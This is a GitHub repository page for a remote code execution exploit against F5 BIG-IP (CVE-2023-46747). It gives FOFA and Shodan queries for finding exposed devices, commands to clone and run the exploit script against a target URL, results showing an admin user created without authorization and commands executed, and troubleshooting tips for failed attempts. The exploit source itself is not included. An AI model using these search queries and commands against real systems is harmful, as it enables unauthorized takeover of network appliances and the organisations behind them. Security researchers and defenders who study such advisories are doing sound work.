Skip to content

W01fh4cker/CVE-2023-46747-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 

Repository files navigation

Vulnerability Details

fofa:

(title="BIG-IP®" || icon_hash="-335242539")

shodan

title:"BIG-IP®"

Affected versions

https://my.f5.com/manage/s/article/K000137353

Vulnerability Recurrence

  1. At this time, the user here is only admin: image

  2. Execute the script:

git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Successfully executed command:
image

  1. A new user was successfully created without authorization here: image

Shortcoming

Exploitation fails in some versions, reference: https://twitter.com/joel_land/status/1729147886615818732.

Q & A

  1. Q: Token acquisition failed?
    A: It cannot be said that there must be no vulnerability in the test site, because creating a user without authorization is not 100% successful. Sometimes you do not create a user in the first step due to some reasons, so the token in the second step cannot be obtained. Therefore, my suggestion is to try a few more times. If it does not work, it may mean that there is indeed no vulnerability.

Digression

You can use this script https://github.com/BishopFox/bigip-scanner to collect F5 BIG-IP version information. It's great!

Reference

projectdiscovery/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

Releases

No releases published

Packages

No packages published

Languages